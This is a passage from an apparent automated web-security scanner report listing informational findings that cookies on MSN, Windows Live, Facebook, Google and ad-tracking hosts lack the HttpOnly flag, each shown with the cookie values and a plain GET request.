MC1=V=3&GUID=410267d1726a48e480f7cffabbfdbf02; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D8AA77AA6972477889BB0708E24E1D83; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.297. http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-life/family-fun/staticslideshowrs.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=fcb37a0085454e42a154dc796c3627c6; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=587C4F381A484F638F5133EFD31A25BE; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/family-fun/staticslideshowrs.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.298. http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-life/new-year-new-you/article.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=86c5ac9c5d5248acbd08455e21fd0f6c; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D57F67F0B6374E41BE43B798CE54D9DE; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/new-year-new-you/article.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.299. http://lifestyle.msn.com/your-look/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=15f7dd757e1f4dd29c256ddabb4fbc01; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=8F8656FEF23A4A4BB26DBD1791075CFD; domain=.msn.com; expires=Sun, 21-Aug-2011 15:32:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/ HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.300. http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/celebrity-style/staticslideshowmc.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=db3e8205e43d4e5eaa57a6d1324745b7; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=ADBCA3C4A108460A871E079DD85C62EB; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/celebrity-style/staticslideshowmc.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.301. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/everyday-style/staticslideshowglamour.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=3f5abd0dc0f84cbe94df6230af2ee06c; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=25F4103F0B9D43649A7DDF5A83578845; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.302. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/everyday-style/staticslideshowlucky.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=b92db3a9296f4d6dac31d28373f517a4; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=86119F07135943FAA639279C0A5E608F; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.303. http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/well-groomed-male/staticslideshowgq.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=82f20f62c0c34e9aa45db0562ae04303; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=792657CF36AE4135914E87FA814E0519; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:18 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.304. http://local.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=c3af7a7696394c059fb54ea07012ac32; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1C752DD9CA8D47F6B859932998A5A5A5; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.305. http://local.msn.com/hourly.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/hourly.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=a88927d5284b4f0db193dcb398666b00; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=DE601FFA41DC4AE7A2ACD605FC555949; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hourly.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.306. http://local.msn.com/movies-events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/movies-events.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=c724f512793f40f7b545863d70887ae9; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=91907563A38849D1A4E116FF013302D8; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies-events.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.307. http://local.msn.com/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/news.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=f947a926dcc6448ab9adb2fe46c957ce; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=BA421F87D3D544989D735829E15D49E7; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.308. http://local.msn.com/restaurants.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/restaurants.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=55093cd8c86c4eec9aa83f4a411553a7; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D4302824917C48BF812A10E485459A9D; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /restaurants.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.309. http://local.msn.com/sports.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/sports.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=91674b5e4f20471eb76593a1de875742; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=29EFBD9A51484401A707F30A0C1054D7; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sports.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.310. http://local.msn.com/ten-day.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/ten-day.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=a493fc2dada348559f36f3b1b7ee2baa; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=A97D30A3A7E74A1390F36B78341CB76F; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ten-day.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.311. http://local.msn.com/weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/weather.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=f0bf2ff54ef24146a8f224ade917b784; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=AD37BD0DAAF74A8193957788A235401B; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /weather.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.312. https://login.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/help/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.313. https://login.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.314. http://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.live.com
Path:	/login.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MSPRequ=lt=1296574540&co=1&id=N; path=/;version=1
MSPOK=$uuid-d45b8a78-d411-4c6c-85b3-f3727bec49d8; path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.315. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MSPRequ=lt=1296574542&co=1&id=N; path=/;version=1
MSPOK=$uuid-1e5aa37a-c2ae-4da1-ac75-4375305bf99f; path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.316. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=3c1c6ba55d5a5743:TM=1296574544:LM=1296574544:S=DhLUtFxFrNdY16c3; expires=Thu, 31-Jan-2013 15:35:44 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.317. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lyc=AwAAAATSI0dNACAAAd1YIASgAAYDSAAApr1EYBcBlVqgFCAAAWxLIASgAAFEXqAIIAADgVEAAA==; domain=.fastclick.net; path=/; expires=Fri, 01-Feb-2013 15:43:38 GMT
pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Fri, 01-Feb-2013 15:43:38 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.318. http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://millenniumhotels.122.2o7.net
Path:	/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26A41302851D26C6-4000010BE0598ACB[CE]; Expires=Sun, 31 Jan 2016 15:25:57 GMT; Domain=millenniumhotels.122.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/millenniumhotelstst/1/H.22.1/s34298913453239?AQB=1&ndh=1&t=1%2F1%2F2011%209%3A26%3A40%202%20360&ns=millenniumhotels&cdp=3&pageName=millenniumboston%3Aindex.html&g=http%3A%2F%2Fwww.millenniumhotels.com%2Fmillenniumboston%2Findex.html&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fie%3DUTF-8%26q%3Dmillenium%2Bboston%26sourceid%3Dchrome&cc=USD&ch=millenniumboston&server=www.millenniumhotels.com&events=event4&c6=flash%2010&c22=Tuesday&v22=Tuesday&c23=9%3A00AM&v23=9%3A00AM&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: millenniumhotels.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]

Response

HTTP/1.1 302 Found
Date: Tue, 01 Feb 2011 15:25:57 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A41302851D26C6-4000010BE0598ACB[CE]; Expires=Sun, 31 Jan 2016 15:25:57 GMT; Domain=millenniumhotels.122.2o7.net; Path=/
Location: http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239?AQB=1&pccr=true&vidn=26A41302851D26C6-4000010BE0598ACB&&ndh=1&t=1%2F1%2F2011%209%3A26%3A40%202%20360&ns=millenniumhotels&cdp=3&pageName=millenniumboston%3Aindex.html&g=http%3A%2F%2Fwww.millenniumhotels.com%2Fmillenniumboston%2Findex.html&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fie%3DUTF-8%26q%3Dmillenium%2Bboston%26sourceid%3Dchrome&cc=USD&ch=millenniumboston&server=www.millenniumhotels.com&events=event4&c6=flash%2010&c22=Tuesday&v22=Tuesday&c23=9%3A00AM&v23=9%3A00AM&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Mon, 31 Jan 2011 15:25:57 GMT
Last-Modified: Wed, 02 Feb 2011 15:25:57 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www95
Content-Length: 0
Content-Type: text/plain

12.319. http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://millenniumhotels.122.2o7.net
Path:	/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_x7Ezx7Fx7Fvx7Dx7Dzfx7Ex7Bx7Cgvx7Fx60gx60g=[CS]v4|0-0|4D48285A[CE]; Expires=Sun, 31 Jan 2016 15:35:54 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.320. http://movies.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=ac2682d41e5a4a9e995a518357a307fd; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.321. http://movies.msn.com/movies/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/movies/article.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=2517094174fb432cac61ae4a83e4cba2; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /movies/article.aspx?news=625907 HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.322. http://movies.msn.com/new-on-dvd/movies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/new-on-dvd/movies/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=3846db8e912c4c41babf7bbf1d72ec94; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-on-dvd/movies/ HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.323. http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=c64fe33f4baf49b3bc5808d8f4db0984; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.324. http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=bf272adeee6c4734bab84b966f463dd6; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.325. http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/in-praise-of-buried/story/across-the-universe/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=e597dff1d43e4f20abc3e13f769d3925; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.326. http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=ad9eb7cabd0844bdab83df2bf8a2e6fd; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.327. http://movies.msn.com/showtimes/showtimes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/showtimes/showtimes.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

THTR=IPP=5; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
MC1=V=3&GUID=77c136239add4ff1b69507318edbbcf5; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /showtimes/showtimes.aspx HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.328. http://movies.msn.com/the-rundown/the-guard/story_5/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/the-rundown/the-guard/story_5/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=d3e5f9ccee7f4c1b92909d2eb7b20019; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /the-rundown/the-guard/story_5/ HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.329. http://mt2.google.com/mapstt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mt2.google.com
Path:	/mapstt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=2f567065d3d0c97c:TM=1296661082:LM=1296661082:S=1EC8GjHZm3yxooIH; expires=Fri, 01-Feb-2013 15:38:02 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mapstt HTTP/1.1
Host: mt2.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.330. http://mt3.google.com/mapstt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mt3.google.com
Path:	/mapstt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=a0a6b72d8073021b:TM=1296661083:LM=1296661083:S=vTLxe1z0Inmp5tnZ; expires=Fri, 01-Feb-2013 15:38:03 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mapstt HTTP/1.1
Host: mt3.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.331. http://music.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://music.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=76b0d6e8fdae4428a122c2611de28248; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: music.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.332. http://music.msn.com/music/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://music.msn.com
Path:	/music/article.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=2cce766a6a6f473ba30e694c272dcc30; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /music/article.aspx?news=626003&gt1=28102 HTTP/1.1
Host: music.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.333. http://my.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=a084dcc2b5364191ad936bfe59f51c19; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: my.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

